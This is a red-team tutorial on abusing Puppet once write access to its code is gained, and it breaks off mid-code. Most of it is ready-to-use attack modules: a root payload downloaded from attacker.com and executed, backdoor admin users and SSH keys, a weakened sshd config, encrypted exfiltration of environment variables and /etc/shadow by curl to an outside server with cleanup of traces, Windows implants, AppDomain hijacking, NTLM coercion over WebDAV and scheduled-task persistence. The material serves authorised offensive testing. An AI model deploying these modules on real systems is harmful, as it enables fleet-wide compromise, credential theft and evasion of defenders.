Abusing Puppet for Red Team Operations

Puppet 101

Puppet is a configuration management tool that makes use of a client-server relationship. Each managed endpoint has a puppet-agent that communicates over SSL back to a Puppet master / PuppetServer. Settings and configuration are combined and served by PuppetServer as a catalog, which is what the Puppet-Agent applies to the managed host.

There have apparently been some issues in the open source community, with Puppet seeming to reduce support for the fully open source version of Puppet in favour of Puppet Enterprise. This series of links alludes to the problem. One. Two. Three. Four. The tl;dr seems to be that OpenVox is the OSS project that appears to be carrying the old Puppet OSS project forward from now on, perhaps similar to how OpenTofu / Terraform parted ways.

The reason I mention this is that I had significant issues (5 hours) in getting the official Puppet containers to work out of the box, whereas I swapped to the containers listed in the docker-compose file and it worked first time.

Puppet is different to Ansible in that Ansible uses SSH to push configuration (via command execution) onto managed hosts, whereas Puppet uses a pull mechanism to the API server hosted on PuppetServer:8140. Both are idempotent and make use of infra as code.

Ansible is significantly easier to understand (YAML linting aside), but that is probably down to experience levels. Ruby is also just plain grim after years of Ansible. Puppet does have some cool features like if your endpoints need Puppet functionality (such as stdlib), then you only need to install it on PuppetServer and all the endpoints receive a compiled for use copy at next check-in.

There is also Puppet Forge, where you can download additional functionality, similar to PyPI or Ansible Galaxy. This means that all the supply chain risks / dependency confusion attacks also apply to third party modules within Puppet.

Puppet is primarily used in large environments (especially around Linux networks) to achieve rapid deployment. I have seen one organisation make use of Puppet to manage their Windows fleet as part of a migration from PowerShell DSC, but it is certainly the exception.

This article will run through setting up a Puppet lab to experiment with (similar to a mini-Enterprise), or you can skip straight to the "I’ve got write access to a Puppet repo, give me a shell" section, called Payloads.

Note: In this lab, we keep our Puppet code on GitLab and it is pushed to PuppetServer on each git commit. In real life though, you could also have compromised SSH access to the PuppetServer, which would allow you to edit the source code directly on the PuppetServer, further reducing the detection risk as there are no git commits for the SOC to look at.

Puppet Terminology

Resources

Resources are the building blocks of Puppet, representing things like files, users, services, or MSI packages. Each resource is declared with attributes that define its desired state – giving us idempotency.

Functions

Functions mainly execute on the PuppetServer and tend to deal with custom logic. We will use a custom function to encrypt and retrieve environment variables from a test system. Puppet also has deferred functions, which are evaluated on the agent when it applies the catalog rather than on the PuppetServer at compile time.

Facts

Conceptually similar to Ansible facts, this allows you to get notifications on system status, but also use the presence / absence / value of facts to govern the execution of later tasks.

# Assumes a custom fact named disk_usage that reports an integer percentage

if $facts['disk_usage'] > 80 {

notify { 'Warning: Root partition is over 80% full!': }

}

Lab Setup

The lab consists of four VMs: PuppetServer, GitLab, GitLabRunner and Ubuntu. The use of a GitLabRunner is not required, but is included so that things are more representative of real world use cases I have seen. Without the GitLabRunner, you would need either:

- A cronjob running on PuppetServer to git pull the latest copy of the Puppet code after you push it to GitLab.

- Manually pull each change to PuppetServer via SSH.

This is because you need to get the latest code onto PuppetServer somehow, so that Puppet Agents can retrieve it. Otherwise you are just making changes in Git and the PuppetServer never has an updated copy on its filesystem.
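The cron option could look roughly like the sketch below. It assumes the environment is checked out at /etc/puppetlabs/code/environments/production (the path used later in this post) and that the checkout already has working Git credentials. The function name sync_puppet_code is made up for illustration.

```shell
#!/bin/sh
# Sketch: fast-forward the Puppet environment checkout on PuppetServer.
# sync_puppet_code is a hypothetical helper name, not part of Puppet.
sync_puppet_code() {
    env_dir="${1:-/etc/puppetlabs/code/environments/production}"

    # Refuse to run if the directory is not a git checkout.
    if [ ! -d "$env_dir/.git" ]; then
        echo "not a git checkout: $env_dir" >&2
        return 1
    fi

    # --ff-only avoids creating merge commits on the server.
    git -C "$env_dir" pull --ff-only --quiet
}
```

Saved as a script that ends with a call to sync_puppet_code, this could be run from root's crontab (for example every five minutes with a `*/5 * * * *` schedule), which trades the immediacy of the runner for a simpler setup.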

I used Portainer to deploy the Lab via docker-compose. You can find the docker-compose config in the repo.

The paragraphs below cover any applicable post-deployment setup (much of this can be done via compose as well, but it is shown manually so you can see how it slots together).

Configure Ubuntu Target Server

Install Puppet-Agent on Ubuntu:

apt update && apt install -y puppet-agent

puppet config print confdir

This command will output the directory of the Puppet config file. Add the below code block to the file (usually /etc/puppet/puppet.conf):

[main]

server=puppet # The resolvable-name of PuppetServer

certname=ubuntu # The SSL Cert that it will request on first run and for future auth

environment=production # Production / Dev etc

[agent]

runinterval=120 # Runs every 2 mins, faster testing

GitLabCI

The GitLab Runner will SSH to PuppetServer to grab the latest Puppet code on each repo change, ready for Ubuntu to pull it, and will also SSH to Ubuntu on each run to run Puppet-Agent, which will pull the newly updated code from PuppetServer.

Set up SSH keys between the servers by generating a key pair on GitLabRunner:

ssh-keygen -t rsa -b 4096 -C "gitlab-runner@puppet" -N "" -f ~/.ssh/id_rsa

cat ~/.ssh/id_rsa.pub

Then add the public key to the .ssh directory on PuppetServer and Ubuntu so the GitLabRunner can authenticate.

mkdir -p ~/.ssh

echo "<PUBLIC_KEY_HERE>" >> ~/.ssh/authorized_keys

chmod 600 ~/.ssh/authorized_keys

chmod 700 ~/.ssh

Also start the SSH server on PuppetServer and Ubuntu so that GitLabRunner can authenticate to them.

echo "PermitRootLogin yes" >> /etc/ssh/sshd_config

service ssh start

You’ll need to register GitLabRunner within GitLab as a valid runner, using the Shell executor. I’ve given it puppet tags which you can see referenced in the YAML of the GitLabCI.

sudo gitlab-runner register \

--non-interactive \

--url "http://gitlab/" \

--token "$RUNNER_TOKEN_FROM_WEB_UI" \

--executor "shell" \

--description "gitlab-runner"

The GitLabCI source code, to be placed in the root of your repo as .gitlab-ci.yml, can be seen in the repo. This ensures that your PuppetServer always has the up to date code, and forces a check-in from the Ubuntu container.

Repo Setup and Puppet Code Guide

As this is just a lab environment, authentication between PuppetServer and GitLab is done through a Personal Access Token (PAT) which was entered upon the first git clone.

The sample payloads can be found in the repo. For simple deployments you can drop everything into a large site.pp, but for more complex deployments that carry out various tasks (across multiple server roles or OSs), it is best practice to split things into various modules. Then you have an overarching site.pp file that references those modules.

It is probably worth understanding these slightly more complex module and class structures as the Puppet infrastructure you are attacking is unlikely to be making use of a single site.pp.

The important thing is that the repo is cloned into /etc/puppetlabs/code/environments/<environment_name> (which is production in our case).

cd /etc/puppetlabs/code/environments

rm -rf production

git clone http://gitlab/puppet/puppet-code.git production

Puppet has the concept of Modules, Classes and Resources. Another useful link for understanding what your target sysadmins are doing is the Puppet Language Reference.





First Lab Run

Provided you have:

- Cloned the repo onto PuppetServer manually the first time

- Set up the SSH key and started SSH on the containers

- Added the GitLab variable for the SSH key.

You should be able to run the GitLab pipeline and the Puppet code should run on the Ubuntu server. You can test for this by seeing if nginx is running and whether /tmp/testfile exists.

You can also SSH to the Ubuntu container and run: puppet agent --test --waitforcert 60, rather than using GitLabCI.

You can also click on the pipeline job to get more information.

Linux Payloads

Now that we have our lab up and running, we can start to look at using Puppet to help advance our red team scenario.

Copies of all of these snippets are found in the linked GitHub repo. After the first payload, I don’t mention that you need to include the new module in the site.pp every single time. To be clear, if you create a new module called foo to do $activity, make sure you add include foo to your main manifests/site.pp.
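Creating the skeleton for a new module can be scripted. The sketch below is a hypothetical helper (scaffold_module is not a Puppet command) that assumes the repo layout used in this post, with modules/<name>/manifests/init.pp and manifests/site.pp under the repo root. It only prints a reminder rather than editing site.pp, because the include normally belongs inside a specific node block.

```shell
#!/bin/sh
# Sketch: scaffold an empty module inside a Puppet code checkout.
# scaffold_module is a hypothetical helper, not a Puppet command.
scaffold_module() {
    repo_root="$1"   # root of the cloned Puppet code repo
    module="$2"      # new module (and class) name, e.g. foo

    manifest_dir="$repo_root/modules/$module/manifests"
    mkdir -p "$manifest_dir" || return 1

    # init.pp must declare a class named after the module.
    if [ ! -f "$manifest_dir/init.pp" ]; then
        printf 'class %s {\n}\n' "$module" > "$manifest_dir/init.pp"
    fi

    # Remind the operator if site.pp does not reference the class yet.
    if ! grep -Eq "include[[:space:]]+${module}([^A-Za-z0-9_:]|\$)" \
        "$repo_root/manifests/site.pp" 2>/dev/null; then
        echo "remember to add 'include $module' to manifests/site.pp"
    fi
}
```

For example, `scaffold_module . foo` run from the repo root creates modules/foo/manifests/init.pp and prints the reminder until site.pp contains include foo.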

A copy of the file structure is shown here so you can see the way that modules are created. If you run puppet module install puppetlabs-stdlib (details) then you will have a boatload more.

tree
.
├── README.md
├── manifests
│   └── site.pp
└── modules
    ├── env_exfil
    │   ├── functions
    │   │   └── encrypt_aes.pp
    │   └── manifests
    │       └── init.pp
    ├── nginx
    │   └── manifests
    │       └── init.pp
    ├── proxyjump
    │   ├── files
    │   │   └── sshd_config
    │   └── manifests
    │       └── init.pp
    ├── sshkey
    │   ├── files
    │   │   └── puppetbackdoor.pub
    │   └── manifests
    │       └── init.pp
    ├── testfile
    │   └── manifests
    │       └── init.pp
    ├── ubuntupayload
    │   └── manifests
    │       └── init.pp
    └── useradd
        └── manifests
            └── init.pp

Implant Deployment

Add the below to manifests/site.pp within GitLab. Note that the regex will mean that this will apply to any host whose hostname begins with ubuntu.

node /^ubuntu.*/ {

include nginx

include testfile

include ubuntupayload # For each NEW module, make sure to include it here.

}

Then add the below to the /modules/ubuntupayload/manifests/init.pp file (also create the directory structure). This assumes you want to deploy it as a new module, or you can add it to an existing one if needed (eg to reduce the size of the diff in git).

The below code contains various || true – this is because I clearly don’t own https://attacker.com, so the download task was failing, causing the run to fail. If a valid domain is used for the download, you can change the config entirely to the one in the second code block.

class ubuntupayload {

# Ensure curl is installed

package { 'curl':

ensure => installed,

}

# Download the binary file (ignore failures)

exec { 'download_ubuntupayload':

command => "/bin/bash -c 'curl -f -L -o /usr/local/bin/ubuntupayload https://attacker.com/ubuntupayload || true'",

path => ['/bin', '/usr/bin', '/usr/local/bin'],

user => 'root',

logoutput => true, # Logs output

creates => '/usr/local/bin/ubuntupayload', # Prevents second download on next run

}

# Ensure the downloaded file has correct permissions

file { '/usr/local/bin/ubuntupayload':

ensure => file,

owner => 'root',

group => 'root',

mode => '0755', # Make it executable

require => Exec['download_ubuntupayload'], # Ensures download task runs first

}

# Execute the binary without failing Puppet apply

exec { 'run_ubuntupayload':

command => "/bin/bash -c '/usr/local/bin/ubuntupayload || true'",

path => ['/bin', '/usr/bin', '/usr/local/bin'],

user => 'root', # Runs as root

logoutput => true, # Logs output

refreshonly => true, # Only runs when file changes

subscribe => File['/usr/local/bin/ubuntupayload'], # Triggers execution when updated

}

}

And here is the code for use when you have a valid domain.

class ubuntupayload {

# Ensure curl is installed

package { 'curl':

ensure => installed,

}

# Download the binary file

file { '/usr/local/bin/ubuntupayload':

ensure => file,

source => 'https://attacker.com/ubuntupayload',

owner => 'root',

group => 'root',

mode => '0755', # Make it executable

replace => true,

require => Package['curl'],

}

# Execute the binary

exec { 'run_ubuntupayload':

command => '/usr/local/bin/ubuntupayload',

path => ['/bin', '/usr/bin', '/usr/local/bin'],

user => 'root', # Runs as root

logoutput => true, # Log output

refreshonly => true, # Only runs when file changes

subscribe => File['/usr/local/bin/ubuntupayload'], # Triggers execution when updated

}

}

You can see what logoutput corresponds to at this link.

Add Local User

To add a user with a password you know and without a home directory, use the below code in /modules/useradd/manifests/init.pp. As with previous examples, you also need to reference the class in manifests/site.pp.

class useradd {

# https://www.puppet.com/docs/puppet/8/types/user.html

# Create the puppetbackdoor user

user { 'puppetbackdoor':

ensure => present,

shell => '/bin/bash',

#home => '/home/puppetbackdoor',

managehome => false,

password => '$6$qwerty$0dYpB0XSLFEx8aN0sLalDi5EjOONkZ4pgP2whBmcx4C37l9F.VmTno0PUJh3Hpb64wVcsxiPm9bAT3Om5w7Fb.', # Encrypted Password for Password123!

}

}

Add SSH Key

Upload the public key that you want to add to an existing (or new user) to the right module directory. You will know which module directory is needed, because that will be the one where you create your new Puppet code.

For example, I put the public key in /modules/sshkey/files/puppetbackdoor.pub because I was adding the functionality to write the SSH key to the sshkey module. The sshkey module init.pp file is below:

class sshkey {

# Add backdoor user

user { 'puppetbackdoor-ssh':

ensure => present,

managehome => true,

home => '/home/puppetbackdoor-ssh',

}

# Create the home directory - this should have occurred from the above resource but sometimes failed.

file { '/home/puppetbackdoor-ssh':

ensure => directory,

owner => 'puppetbackdoor-ssh',

group => 'puppetbackdoor-ssh',

mode => '0755',

require => User['puppetbackdoor-ssh'],

}

# Ensure .ssh directory exists within the home directory

file { '/home/puppetbackdoor-ssh/.ssh':

ensure => directory,

owner => 'puppetbackdoor-ssh',

group => 'puppetbackdoor-ssh',

mode => '0700',

require => File['/home/puppetbackdoor-ssh'],

}

# Write the authorized_keys file

file { '/home/puppetbackdoor-ssh/.ssh/authorized_keys':

ensure => file,

owner => 'puppetbackdoor-ssh',

group => 'puppetbackdoor-ssh',

mode => '0600',

source => 'puppet:///modules/sshkey/puppetbackdoor.pub',

require => File['/home/puppetbackdoor-ssh/.ssh'],

}

}

Add Proxy Jump Ability

I’ve had success in amending the SSH config of target servers to allow for SOCKS / TCP forwarding or Agent Forwarding. Most sysadmins will be familiar with parsing through /etc/ssh/sshd_config, but not as many will remember to check /etc/ssh/sshd_config.d/<your_config_here>. On stock Ubuntu, sshd_config includes /etc/ssh/sshd_config.d/*.conf near the top of the file and sshd uses the first value it reads for each option, so options specified in the sshd_config.d directory override those in the normal sshd_config file.
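Whether a drop-in is read at all depends on the Include lines in the main sshd_config. On stock Ubuntu the pattern is /etc/ssh/sshd_config.d/*.conf, so a file without the .conf suffix is silently ignored. The sketch below is a hypothetical helper (dropin_is_included is not an OpenSSH tool) that checks a planned file name against those Include patterns. It uses shell case matching, which is slightly looser than sshd's own globbing because * can also match a slash.

```shell
#!/bin/sh
# Sketch: would sshd load this drop-in, given the Include lines in the
# main config? dropin_is_included is a hypothetical helper name.
dropin_is_included() {
    main_config="$1"   # e.g. /etc/ssh/sshd_config
    dropin="$2"        # absolute path of the candidate drop-in

    # Collect every pattern that follows an Include keyword.
    patterns=$(awk 'tolower($1) == "include" { for (i = 2; i <= NF; i++) print $i }' "$main_config")

    while IFS= read -r pattern; do
        # Relative Include paths are resolved against /etc/ssh.
        case "$pattern" in
            /*) ;;
            *) pattern="/etc/ssh/$pattern" ;;
        esac
        # An unquoted $pattern is treated as a glob by case.
        case "$dropin" in
            $pattern) return 0 ;;
        esac
    done <<EOF
$patterns
EOF
    return 1
}
```

For example, `dropin_is_included /etc/ssh/sshd_config /etc/ssh/sshd_config.d/backdoor.conf` succeeds against the stock Include line, whereas a name such as backdoor_config does not.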

You can use Puppet to deploy a backdoor’d SSH config, perhaps for certain users (that you have access to) to prevent weakening the posture too much.

class proxyjump {

# Stock Ubuntu only includes sshd_config.d/*.conf, hence the .conf suffix

file { '/etc/ssh/sshd_config.d/proxyjumpbackdoor.conf':

ensure => file,

owner => 'root',

group => 'root',

mode => '0644',

source => 'puppet:///modules/proxyjump/sshd_config',

#require => Package['openssh-server'], For regular VMs with sshd as a service

#notify => Service['ssh'],

}

}

Pair this with an amended sshd_config file that is written to the target filesystem by the above task. Store this within your module directory in files (eg modules/proxyjump/files/sshd_config).

AllowAgentForwarding yes

PermitTunnel yes

GatewayPorts yes

PubkeyAuthentication yes

PasswordAuthentication no

AllowStreamLocalForwarding yes

PermitRootLogin yes

# If you also create a user dedicated for abusing ProxyJump, you can permit their account to be used for -J but no others.

#Match User proxyuser

# AllowTcpForwarding yes

# PermitOpen any

# X11Forwarding yes

Exfiltrate EnvVars to External Server

Puppet doesn’t have the ability to do fairly basic operations such as base64 / AES crypto out of the box. But there is a plugin that will at least give you base64, it is installed on PuppetServer via puppet module install puppetlabs-stdlib. It contains loads of pretty much essential functionality, so is likely to be pre-installed in most places. It is obviously critical that we encrypt sensitive environment variables both via SSL and also via AES if possible.

You then need to create a custom Puppet function (functions usually run on the PuppetServer) which will shell out from Puppet and create temporary files. These are then sent via a web request. Place in /modules/env_exfil/functions/encrypt_aes.pp.

function env_exfil::encrypt_aes(

String $plaintext,

String $key = 'WibbleDibbleMyKey123',

String $iv = '1234567890123456'

) >> String {

# Base64 encode the plaintext

$base64_text = base64('encode', $plaintext)

# Return the OpenSSL command as a string

$cmd = "echo '${base64_text}' | openssl enc -aes-256-cbc -salt -pbkdf2 -pass pass:${key} -base64 -iv ${iv} > /tmp/encrypted_data.txt"

return $cmd

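}

The encrypted values are then picked up by the module's normal init.pp, sent to the webserver of your choice, and decrypted offline via a bash script. The listing below requires an Exec['encrypt_env_vars'] resource that runs the command returned by the function. That resource appears in the agent log later in this post but is not reproduced here, so see the repo for the full module. As the requests are quite large, change /etc/apache2/apache2.conf to contain the line LimitRequestLine 64768 and then restart Apache.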

class env_exfil {

package { 'curl':

ensure => installed,

}

# Create a temporary bash script to exfil the env vars.

file { '/tmp/send_encrypted_env.sh':

ensure => file,

mode => '0755',

content => "#!/bin/sh\ncurl -X GET 'https://tommacdonald.co.uk/log.php?data='$(cat /tmp/encrypted_data.txt | tr -d '\n')",

require => Exec['encrypt_env_vars'],

}

# Run the script, consider adding cleanup of the two files in /tmp

exec { 'send_encrypted_env':

command => '/bin/sh /tmp/send_encrypted_env.sh',

path => ['/usr/bin', '/bin'],

timeout => 30,

require => File['/tmp/send_encrypted_env.sh'],

}

}

Upon Puppet running on Ubuntu, you’ll receive a mahoosive blob of base64 text as a GET request (this is obviously doable via POST, but needs Apache plugins/modules to support it). Put the large blob in encrypted_envvars.txt.

You can then use this definitely-not-ChatGPT bash script to decrypt.

#!/bin/bash

KEY="WibbleDibbleMyKey123"

IV="1234567890123456"

ENCRYPTED_FILE="encrypted_envvars.txt"

base64 -d "$ENCRYPTED_FILE" > decrypted_tmp.bin

openssl enc -aes-256-cbc -d -salt -pbkdf2 -pass pass:"$KEY" -iv "$IV" -in decrypted_tmp.bin -out final_output.txt

base64 -d final_output.txt > original_envvars.txt

cat original_envvars.txt

This gives you output similar to:

./decrypt_envvars.sh | grep -i ubuntu

base64: invalid input

hex string is too short, padding with zero bytes to length

{"distro"=>{"release"=>{"full"=>"24.04", "major"=>"24.04"}, "codename"=>"noble", "description"=>"Ubuntu 24.04.1 LTS",

Exfiltrate File to External Server

A similar flow can be used to encrypt a file (that must exist already) and exfiltrate it to an external server. This is made up of an encryption function, and a now-familiar module init.pp.
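Both exfiltration flows rest on the same base64, AES-256-CBC, base64 round trip, which can be checked locally before touching a target. The sketch below is not the author's script. The function names are hypothetical, and it deliberately leaves out -iv. With -pass and -pbkdf2, openssl derives the IV from the password and salt, and a 16-character value is too short for the 32 hex digits that -iv expects, which is what the "hex string is too short" warning in the sample output refers to.

```shell
#!/bin/sh
# Sketch: base64 -> AES-256-CBC -> base64 round trip, mirroring the
# flow used by the exfil modules. Function names are hypothetical.
KEY="WibbleDibbleMyKey123"

encrypt_blob() {
    # Reads plaintext on stdin, writes a single line of base64 ciphertext.
    base64 | openssl enc -aes-256-cbc -salt -pbkdf2 -pass "pass:$KEY" -base64 | tr -d '\n'
}

decrypt_blob() {
    # Reverses encrypt_blob: ciphertext on stdin, plaintext on stdout.
    base64 -d | openssl enc -d -aes-256-cbc -pbkdf2 -pass "pass:$KEY" | base64 -d
}
```

For example, `printf 'secret' | encrypt_blob | decrypt_blob` should print the input back, provided the local openssl supports -pbkdf2 (1.1.1 or later).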

class file_exfil {

# Encrypt the file using the function. It must exist.

exec { 'encrypt_file':

command => file_exfil::encrypt_file('/etc/shadow'),

path => ['/usr/bin', '/bin'],

}

# Create a temporary bash script to send encrypted file contents via GET

file { '/tmp/send_encrypted_file.sh':

ensure => file,

mode => '0755',

content => "#!/bin/sh

curl -X GET 'https://tommacdonald.co.uk/fileupload?data='$(cat /tmp/encrypted_file.txt | tr -d '\n')",

require => Exec['encrypt_file'],

}

# Run the script to send the encrypted file

exec { 'send_encrypted_file':

command => '/bin/sh /tmp/send_encrypted_file.sh',

path => ['/usr/bin', '/bin'],

timeout => 30,

require => File['/tmp/send_encrypted_file.sh'],

}

# Explicitly remove the encrypted file after transmission

exec { 'cleanup_encrypted_file':

command => 'rm -f /tmp/encrypted_file.txt',

path => ['/usr/bin', '/bin'],

require => Exec['send_encrypted_file'],

}

# Explicitly remove the temporary script after execution

exec { 'cleanup_send_script':

command => 'rm -f /tmp/send_encrypted_file.sh',

path => ['/usr/bin', '/bin'],

require => Exec['cleanup_encrypted_file'],

}

}

Note that this will generate more verbose output in the Puppet-Agent log due to the Exec functionality – you can see the output from env_exfil and file_exfil, but none of the other modules.

root@ubuntu:/# puppet agent --test

[SNIPPED]

Notice: /Stage[main]/Env_exfil/Exec[encrypt_env_vars]/returns: executed successfully

Notice: /Stage[main]/Env_exfil/File[/tmp/send_encrypted_env.sh]/ensure: defined content as '{sha256}63b8195d4a37a3401ff6318bcb85edb2551c5b652fb226db1857f488ec4ea51a'

Notice: /Stage[main]/Env_exfil/Exec[send_encrypted_env]/returns: executed successfully

Notice: /Stage[main]/Env_exfil/Exec[cleanup_encrypted_env]/returns: executed successfully

Notice: /Stage[main]/File_exfil/Exec[encrypt_file]/returns: executed successfully (corrective)

Notice: /Stage[main]/File_exfil/File[/tmp/send_encrypted_file.sh]/ensure: defined content as '{sha256}e3a55e98eef4bbff222987f52c5f64c7a707b7ba12e6231bac03b35a3c5363f8' (corrective)

Notice: /Stage[main]/File_exfil/Exec[send_encrypted_file]/returns: executed successfully (corrective)

Notice: /Stage[main]/File_exfil/Exec[cleanup_encrypted_file]/returns: executed successfully (corrective)

Notice: /Stage[main]/File_exfil/Exec[cleanup_send_script]/returns: executed successfully (corrective)

You can then use an almost identical bash script to decrypt the file.

#!/bin/bash

KEY="WibbleDibbleMyKey123"

IV="1234567890123456"

base64 -d encrypted_file.txt > decrypted_tmp.bin

openssl enc -aes-256-cbc -d -salt -pbkdf2 -pass pass:"$KEY" -iv "$IV" -in decrypted_tmp.bin -out final_output.txt

cat final_output.txt | base64 -d

Which looks like this in usage:

./decrypt_file2.sh

hex string is too short, padding with zero bytes to length

root:$y$j9T$R7v.LIplRQNqcjtDDkvgO/$C/X/s55I.EMLRxq0PFVIWVpTNtuK8XKBRZRGDEhkgv1:20157:0:99999:7:::

daemon:*:20115:0:99999:7:::

bin:*:20115:0:99999:7:::

Puppet on Windows

You can also use Puppet to deploy and manage files / users on Windows. To enroll Puppet-Agent on Windows into your Puppet infrastructure, use the following steps.

Invoke-WebRequest -Uri "https://downloads.puppet.com/windows/puppet7/puppet-agent-x64-latest.msi" -OutFile "C:\puppet-agent.msi"

Start-Process -FilePath "msiexec.exe" -ArgumentList "/i C:\puppet-agent.msi /qn" -Wait

Then edit C:\ProgramData\PuppetLabs\puppet\etc\puppet.conf with the following contents.

[main]

server=puppet

autoflush=true

manage_internal_file_permissions=false

certname=windows

environment=production

runinterval=120

The Puppet service needs a restart to pick up the new config, via Restart-Service puppet. If you are using a VM outside of your Docker stack, add the IP of puppet to your hosts file.

You can then run the Puppet-Agent on Windows.

& 'C:\Program Files\Puppet Labs\Puppet\bin\puppet.bat' agent --test

Info: Creating a new RSA SSL key for windows

Info: csr_attributes file loading from C:/ProgramData/PuppetLabs/puppet/etc/csr_attributes.yaml

Info: Creating a new SSL certificate request for windows

Info: Certificate Request fingerprint (SHA256): 83:C1:35:25:39:60:0B:9B:D9:77:66:A6:86:1C:50:64:31:7F:FD:20:09:76:B5:3C:3D:DC:92:7F:73:FB:0D:F3

Info: Downloaded certificate for windows from https://puppet:8140/puppet-ca/v1

Info: Using environment 'production'

Info: Retrieving pluginfacts

Info: Retrieving plugin

[SNIPPED]

Implant Deployment

It is simple enough to get Puppet to deploy an exe for you, however it needs some form of ‘condition’ so that it knows that the process is already running, or you will end up receiving an implant every time that Puppet-Agent runs. Some form of ‘file based mutex’ could work. Place the below lines in modules/windows_runbinary/manifests/init.pp.

class windows_runbinary {

file { 'C:\Windows\Temp\implant.exe':

ensure => file,

source => 'puppet:///modules/windows_runbinary/implant.exe',

owner => 'Administrator',

group => 'Administrators',

mode => '0777',

}

# Run the binary as SYSTEM only if C:\Users\Public\implant_mutex_file.txt does not exist

exec { 'run_implant':

command => 'C:\Windows\Temp\implant.exe',

creates => 'C:\Users\Public\implant_mutex_file.txt',

provider => 'windows',

require => File['C:\Windows\Temp\implant.exe'],

}

file { 'C:\Users\Public\implant_mutex_file.txt':

ensure => file,

content => 'Mutex file to prevent multiple executions',

owner => 'Administrator',

group => 'Administrators',

mode => '0644',

require => Exec['run_implant'],

}

}

Puppet also has the idea of onlyif, which acts as a conditional. Here is an example.

exec { 'logrotate':

path => '/usr/bin:/usr/sbin:/bin',

provider => shell,

onlyif => 'test `du /var/log/messages | cut -f1` -gt 100000',

}

Add Local Admin User / Domain User

Using a similar concept (and the same module as we used for the Linux backdoor user), we can create additional local admin users on Windows.

Looking at the source code for /manifests/site.pp, we can see that we have an identical structure to how we targeted Ubuntu machines.

node /^windows.*/ {

include useradd

}

The useradd module then contains these lines within the modules/useradd/manifests/init.pp file. Note that the useradd module is the same between Ubuntu and Windows; the filtering happens inside the module itself, rather than in site.pp.

class useraddwindows {

# https://www.puppet.com/docs/puppet/7/resources_user_group_windows.html

if $facts['os']['family'] == 'Windows' {

user { 'puppetlocaluser':

ensure => present,

password => 'Password123!',

groups => ['Administrators'],

managehome => true,

}

user { 'GOAD\puppetdomainuser':

ensure => present,

groups => ['Administrators'],

provider => 'windows_adsi', # Use ADSI provider for domain accounts

}

}

}

Note that the class is called useraddwindows. You cannot have the same class name as the Ubuntu tasks despite the filtering. This can then be applied to Windows in the below fashion (or wait 2 minutes):

& 'C:\Program Files\Puppet Labs\Puppet\bin\puppet.bat' agent --test

Info: Using environment 'production'

Info: Retrieving pluginfacts

Info: Retrieving plugin

Info: Loading facts

Notice: Catalog compiled by puppet

Info: Caching catalog for windows

Info: Applying configuration version '1741634000'

Notice: /Stage[main]/Useradd/User[puppetbackdoor]/ensure: created

Info: Creating state file C:/ProgramData/PuppetLabs/puppet/cache/state/state.yaml

Notice: Applied catalog in 0.16 seconds

And we see the backdoor user is created.

net user

User accounts for \\WINDOWS

-------------------------------------------------------------------------------

Administrator DefaultAccount Guest

puppetbackdoor

MSI Deployment



Puppet runs in the context of SYSTEM, so wherever you place your payload needs to be accessible by that context. It’s very likely you can find a fileshare that Domain Computers can read from, or you can always supply the payload as a Puppet-hosted file (via Git) as seen in the AppDomain Hijack code.

The name of the package below must match the DisplayName of the package, otherwise Puppet doesn’t know it is installed and will keep retrying. You can obviously customise this during your malicious MSI development. Check what Puppet thinks the installed packages on the target are via: puppet.bat resource package.

https://www.puppet.com/docs/puppet/8/resources_package_windows#resources_package_windows

class windows_msipackage {

package { 'RedTeam':

ensure => installed,

source => '\\\\fileserver01\\software\\redteam.msi',

install_options => ['/my_custom_args'],

}

}

AppDomain Hijack

You need to upload the payload files to the modules/windows_appdomain/files/<filename> location in order for Puppet to host them.

class windows_appdomain {

$target_dir = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319'

$mutex_file = 'C:\Users\Public\appdomhijack_mutex_file.txt'

file { $target_dir:

ensure => directory,

}

file { "${target_dir}\\appdomhijack.exe":

ensure => file,

source => 'puppet:///modules/windows_appdomain/appdomhijack.exe', # Served from modules/windows_appdomain/files/

require => File[$target_dir],

}

file { "${target_dir}\\appdomhijack.exe.config":

ensure => file,

source => 'puppet:///modules/windows_appdomain/appdomhijack.exe.config',

require => File[$target_dir],

}

file { "${target_dir}\\appdomhijack.dll":

ensure => file,

source => 'puppet:///modules/windows_appdomain/appdomhijack.dll',

require => File[$target_dir],

}

# Run AppDomain Hijack executable only if mutex file does NOT exist

exec { 'run_appdomhijack':

command => "\"${target_dir}\\appdomhijack.exe\"",

creates => $mutex_file, # Prevents re-execution if the mutex file exists

provider => 'windows',

require => [ File["${target_dir}\\appdomhijack.exe"],

File["${target_dir}\\appdomhijack.exe.config"],

File["${target_dir}\\appdomhijack.dll"] ],

}

# Create mutex file after execution to prevent reruns

file { $mutex_file:

ensure => file,

content => 'Mutex file to prevent multiple executions',

require => Exec['run_appdomhijack'],

}



}NTLMRelaying of SYSTEM account

Puppet runs as SYSTEM when on a domain joined machine, but despite running as SYSTEM on my test non-domain joined machine, you will receive NTLM authentication as the currently running user account.

In a domain-joined environment, you can leverage this SYSTEM authentication to coerce NTLM authentication to configure shadow credentials / RBCD.

This is despite Puppet running as SYSTEM on the non-domain joined test system.

WebClient

During my testing, passing a WebDAV path as a source for an MSI (or similar) to Puppet did not result in the WebClient service automatically starting. However, you could use Puppet to start the WebClient service, and then pass UNC paths, which did result in an HTTP authentication. For the below demo, I manually started the WebClient service, but code to start the service is a few code blocks down.

The contents of a modules/windows_relay/manifests/init.pp file:

class windows_relay {

package { 'RedTeam':

ensure => installed,

source => '\\\\192.168.0.5@8080\\TMP\\notexist.msi',

install_options => ['/my_custom_args'],

}

}

On a listening Ubuntu machine:

sudo nc -lnvp 8080

Listening on 0.0.0.0 8080

Connection received on 192.168.0.200 50424

OPTIONS /TMP HTTP/1.1

Connection: Keep-Alive

User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045

translate: f



Host: 192.168.0.5:8080For a lift-and-shift module to start the WebClient and coerce NTLM authentication, use the below code.

class windows_relay_webdav {

service { 'WebClient':

ensure => running,

enable => true,

hasrestart => true,

provider => windows,

}

package { 'RedTeam':

ensure => installed,

source => '\\\\192.168.0.5@8080\\TMP\\notexist.msi',

install_options => ['/my_custom_args'],

}

}Which gives us:

Scheduled Task



You can also blend various options from the previous code blocks together to run your payload as a Scheduled Task. The existing SchTask module in Puppet appears to make use of an older SchTask API, but it still works. The module linked in the code block has more functionality but needs installing via a Puppetfile (conceptually similar to a pip/pypi requirements or ansible-galaxy requirements, only Puppet calls it a Forge.)

# Consider using this upgraded module instead: https://forge.puppet.com/modules/puppetlabs/scheduled_task/readme

class windows_schtask {

scheduled_task { 'RedTeamTask':

ensure => present,

command => 'C:\users\public\implant.exe',

arguments => '""',

enabled => true,

trigger => [{

schedule => 'weekly',

day_of_week => ['mon'],

start_time => '09:00',

}],

